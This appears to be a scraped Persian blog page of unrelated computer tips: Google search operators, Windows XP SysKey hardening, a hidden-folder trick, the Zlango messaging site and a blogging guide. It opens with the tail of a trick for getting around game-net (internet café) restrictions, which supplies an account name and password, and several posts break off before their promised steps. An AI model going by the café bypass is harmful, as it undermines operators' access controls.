کردن اکانت ، اطلاعات را بصورت زیر وارد نمایید.

User name: meysam       / Password: meysam663logof3  

در پایان به این نکته توجه داشته باشید که این ترفند تنها جنبه آموزشی داشته و

 تمام مسئولیت استفاده از آن به عهده کاربر استفاده کننده میباشد.
همچنین ممکن است در بعضی از گیم نت ها این قابلیت توسط مدیر گیم نت

 مسدود شده باشد.

مبانی جستجوی گوگل:
وقتی شما چند کیورد (Keywords) را با هم جستجو می‌کنید، یک موتور جستجو یک استراتژی از پیش تعیین شده‌ای برای بررسی و ترکیب کیوردهای شما دارد. آیا هر یک از کیوردها می‌توانند به تنهایی در هر جای صفحه وجود داشته باشند یا باید کنار هم قرار گرفته‌ باشند؟ آیا موتور جستجو کلمات کلیدی را با هم جستجو می‌کند یا تک‌تک؟

جستجوی یک عبارت:
گوگل به صورت پیش‌فرض، کلمات کلیدی شما را در هر کجای صفحه، چه کنار هم باشند و چه به صورت پراکنده، جستجو می‌کند. برای تغییر نتایج صفحات با کلمات مرتب شده موردنظر ما، آنها را در بین دو کوتیشن قرار می‌دهیم.

برای جستجوی کیوردهای زیر:
to be or not to be

گوگل کیوردها را در هر جای صفحه که آمده باشند، پیدا خواهد کرد. اگر شما می‌خواهید تنها نتایجی را ببینید که کیوردها با هم و به عنوان یک عبارت در صفحه آمده‌اند، آنها را در بین دو کوتیشن قرار دهید:
"to be or not to be"

گوگل در این حالت تنها نتایجی را نشان می‌دهد که کیوردها با هم ظاهر شده‌اند. البته گوگل کلماتی مثل «or» و «to» را در این حالت جستجو نمیکند.
جستجوی عبارت به این روش همچنین زمانی مفید است که شما می‌خواهید عبارتی را بیابید، اما مطمئن نیستید که جمله‌بندی عبارت مورد نظر شما درست باشد که این مطلب که مکمل این قسمت است در بخش Full-Word Wildcards شرح داده شده است.

اساس بول
یک موتور همه کیوردها یا هر یک از آنها را جستجو می‌کند که بر اساس پیش‌فرض بولی صورت می گیرد. موتورهای جستجو می توانند از AND برای جستجوی همه کیوردها یا OR برای جستجوی هر کلمه استفاده کنند.
در نتیجه حتی اگر موتو جستجو به صورت پیش فرض همه کیوردها را جستجو کند شما می توانید معمولا به آن یک دستور خاصی بدهید تا آن‌را برای یافتن هر کیورد راهنمایی کنید.

پیش فرض بولی گوگل AND است، یعنی اگر شما کلماتی را بدون اصلاح کننده ها جستجو نمایید همه کلمات شما را با هم جستجو می نماید.
به عنوان مثال اگر شما برای کلمات زیر جستجو کنید:
snowblower Honda "Green Bay"

موتور، جستجو را برای همه کیوردها باهم انجام می‌دهد. اگر شما مایلید که مشخص کنید که هر کدام از کلمه‌ها یا عبارات قابل قبول است یک OR بین هر کدام قرار دهید:
snowblower OR snowmobile OR "Green Bay"

اگر شما اصطلاحی را به همراه یک یا دو اصطلاح دیگر میخواهید، ‌آنها را در پرانتز قرار دهید مثل:
snowblower (snowmobile OR "Green Bay")

میتوانید جستجو برای کلمه snowmobile یا عبارت "Green Bay" به همراه کلمه Snowblower را با پایپ که معادل OR است به صورت زیر جستجو کنید که علامت | پایپ نامیده میشود:
snowblower (snowmobile | "Green Bay")

خنثی سازی:
اگر شما مایلید که آیتمی در جستجوی شما ظاهر نشود قبل از آن – قرار دهید:
snowblower snowmobile -"Green Bay"

موتور در این حالت صفحاتی را که شامل snowblower snowmobile هستند و "Green Bay" را در بر ندارند خواهد یافت. نکته ای که باید به آن توجه کرد، علامت – باید درست قبل از کلمه ای که شما آن را در نتایج نمی‌خواهید، باید قرار بگیرد اگر از فاصله نیز استفاده شود دیگر این دستور جواب نمیدهد.

دیروز در سایت Microsoft مطلبی با عنوان SysKey utility to secure the Windows Security Accounts  مشاهده کردم که  مطلب بسیار جالبی در زمینه افزایش امنیت فایل SAM ( Security Accounts Management ) بود که منجرب به افزایش امنیت ورود به ویندوز xp می شد و به همین خاطر آن را با تغییراتی مفید در وبلاگ قرار دادم تا دیگر دوستان نیز این مطلب استفاده کنند .
همان طور که می دانید ویندوز XP برای افزایش امنیت ورود به آن امکان قرار دادن پسورد در هنگام بالا آمدن ویندوز را مهیا کرده است و اطلاعات مربوط به پسورد ویندوز در فایلی به نام SAM قرار می گیرد که این فایل در مسیر WINDOWS\system32\config قرار دارد و خواندن اطلاعات این فایل به راحتی امکان پذیر نمی باشد ولی روش هایی وجود دارد که براحتی می توان اطلاعات داخل این فایل را اگر بروی هارد باشد از طریق نرم افزارهای خاص که تحت سیستم عامل DOS بوت می شوند هک و آن را تغییر داد ( حتی برای خود من اتفاق افتاده بود که پسورد ورود به ویندوز را فراموش کرده بودم و با استفاده از این نرم افزارها پسورد خود را بدست آوردم ). به همین دلیل در ویندوز XP برای افزایش امنیت ورود به ویندوز و هک نشدن اطلاعات داخل فایل SAM می توان از SysKey utility برای امنیت بیشتر این فایل استفاده کرد . در واقع با  SysKey utility که در داخل خود ویندوز وجود دارد می توان با مخفی کردن اطلاعات داخل این فایل و انتقال آن به جای دیگر مانع از دسترسی دیگران به اطلاعات داخل آن شد .

برای انجام این کار ابتدا به ترتیب زیر عمل کنید :
1- در منوی RUN عبارت syskey را تایپ کنید و کلید OK را کلیک کنید
2- بعد از باز شدن پنجره Securing the Windows Account Database بروی دکمه Update کلیک کنید
3- بعد از باز شدن پنجره Startup KEY در قسمت System Generated Password تیک کنار عبارت Store Startup Key on Floppy Disk را فعال کنید و بروی گزینه دکمه ok کلیک کنید .
4- اینک ویندوز از شما در خواست قراردادن یک فلاپی را می کند تا اطلاعات داخل فایل SAM را در این فلاپی قرار دهد و شما با قرار دادن یک فلاپی در Floppy drive ، بروی دکمه ok کلیک کنید .

از این زمان به بعد ویندوز تنها در زمانی اجرا می شود که فلاپی مورد نظر در Floppydrive باشد در غیر این صورت امکان اجرای ویندوز وجود ندارد . در کل این روش دارای امنیت بسیار زیادی می باشد و امنیت ورود به ویندوز را بسیار بالا می برد . در ضمن برای برای برگشت به حالت قبل مجددا در منوی run عبارت syskey را تایپ کنید و بعد از زدن کلید update ، تیک کنار عبارت Store Startup Key Locally را فعال کنید و بروی دکمه ok کلیک کنید .   

آموزش کامپیوتر امروز بیان روشی بسیار جالب برای ایجاد پوشه ای ( Folder ) با امنیت بالا در ویندوز xp می باشد . خیلی از دوستان برای اینکه امنیت فایل ها و پوشه های خود رادر ویندوز ایکس پی بالا ببرند و مانع از دسترسی دیگران به آن ها شوند کارهای مختلفی انجام می دهند که عمده ترین آنها یا مخفی کردن پوشه (hide a folder ) و یا از نرم افزار های مختلف برای قفل گذاری و پسورد گذاری بروی پوشه استفاده می کنند . روش اول روش کاملا غیر قابل اعتمادی می باشد زیرا بسیاری از کاربران آشنایی کامل با ابزار hidden files دارند و این احتمال وجود دارد که کاربری که از کامپیوتر شما استفاده می کند آشنایی با این ابزار داشته باشد و به راحتی بتواند فایل های مخفی شما را ببیند و روش دوم استفاده از نرم افزار ، روش خوبی می باشد ولی این روش دارای ایراداتی می باشد از جمله فراموش کردن کلمه رمز و امکان دسترسی به پوشه مورد نظر بسیار مشکل می شود ، بروز مشکل در نرم افزار پسورد گذاری و همچنین از طریق محیط داس ( Dos ) به راحتی و بدون هیچ گونه مشکلی می توان وارد برخی ازپوشه های پسورد گذاری شد. اما روشی که این سری می خواهم برای دوستان آموزش دهم بسیار ساده و بدون نیاز به نصب نرم افزار و با استفاده از برخی ویژگی های خود ویندوز xp می باشد . یکی از حسن های این روش این می باشد که کاربر به هیچ عنوان به پوشه مورد نظر شک نمی کند ؟؟؟

ابتدا پوشه ای جدید ( New folder ) در بخشی از هارد خود ایجاد کنید و نام آنرا control بگذارید . بعد از اینکه پوشه ای به نام control ایجاد کردید فایل Lock را از زیر دانلود کنید ( فایل زیر فایل بسیار ساده و کم حجمی با فرمت bat می باشد که در انتهای آموزش نحوه ساخت آن را آموزش می دهم )

Zlango از جمله سایت های بسیار جالبی است که دوستان می توانند به شکلی کاملا متفاوت پیغام خود برای دیگران ارسال کنید . در این سایت شما به جای نوشتن متن با استفاده از تصاویر پیغام خود را به دوستان ارسال می کنید یعنی با به کار بردن آیکون های بسیار جالب ، به جای کلمات می توانید به راحتی پیام خود را به ایمیل دوستانتان ارسال کنید . این سایت بالغ بر 200 آیکون دارد که هر کدام معادل یک یا چند کلمه می باشد و نکته ای که بسیار جالب می باشد این است که تقریبا این 200 آیکون برای ارسال هر نوع پیغامی به دوستان و فامیل کافی است و احساس کمبود آیکون را نمی کنید .

وبلاگ ها در واقع يادداشت هاي روزانه اي هستند كه صاحب وبلاگ در هر موردي كه بخواهد در آن مي نويسد. وبلاگ ها عموماً شخصي هستند. هزينه زيادي در بر نمي گيرند و مرتباً بايد آن را به روز كرد. نوشته ها در يك وبلاگ به طور خودكار در قالب پيش ساخته جاي گرفته و در دسترس همگان قرار مي گيرد. وبلاگ ها مي توانند به صورت گروهي نيز باشند تا در آن ايده ها، ديدگاهها ، پيامها، نظرات تفكرات و انديشه مختلفي قرار گيرد. با توجه به فضاهاي زياد و خدمات مختلفي در اختيار وبلاگ نويسان است، افراد زيادي به اين شيوه روي آورند و رقابتي بين آنها ايجاد گرديده است. از مزيت هاي وبلاگ  اين است كه شما مي توانيد يك ارتباط دو طرفه داشته باشيد و عقايد خود را با دنياي اينترنت به مشاركت بگذاريد.

براي اضافه كردن يك وبلاگ به سايت خود مي توانيد به راههاي گوناگوني متوسل شويد مي توانيد نرم افزارهاي مناسب را روي سرورتان نصب كنيد. راه ديگر اين است كه يكي از سرويس هاي ميزبان رايگان بلاگ را به كار ببريد. براي اينكه كار را برايتان آسانتر كرده باشيم، راه دوم را انتخاب كرده و با هم بررسي مي نماييم. (يعني استفاده از (www.blogger.com) به عنوان سرويس  تأمين كننده بلاگ.) هنگامي كه وبلاگ را با استفاده از بلاگ راه اندازي كرديد مي توانيد از طريق سايتتان به آن وصل شويد. اگر اين امكان برايتان وجود داشته باشد كه ساليانه در حدود ۱۵ دلار آمريكا يا ۹ ليره انگليس بپردازيد آنگاه مي توانيد از آگهي هاي تبليغاتي كه در بالاي صفحه شما ظاهر مي شوند خلاص شويد. مراحل زير را دنبال كنيد:

منبع :  www.kurdit.net

پيش درآمد:
مي دانم كه براي نوشتن راهنماي ساخت وبلاگ خيلي دير است. مي دانم که تا حالا درصد کامپيوتر دار هاي فارسي زبان با وبلاگ آشنا شده اند. ميدانم که کار با پرشين بلاگ خيلي آسان است و احتياج به راهنما ندارد. يا مثلا بي کلاسي است. کسي به سن و سال من الان بايد راهنماي مووبل تايپ و php بنويسد.(اين هام حتما روي چشم توضيح ميدم) ولي با همه اين ها ميخواهم يك راهنماي كامل براي ساخت وبلاگ بنويسم و وجدان خودم را راحت كنم. حالا اگر اين راهنما فقط براي چند نفر هم مفيد باشد براي من كافي است . از دوستان حرفه اي هم خواهشمندم كه اين چند يادداشت را ناديده بگيرند. سعي ميكنم اين مقاله را در چند يادداشت تمام كنم و بعد همه آن را بصورت ebook درآورم و براي دانلود بگذارم.
 منبع : www.Ashyaneeh.Com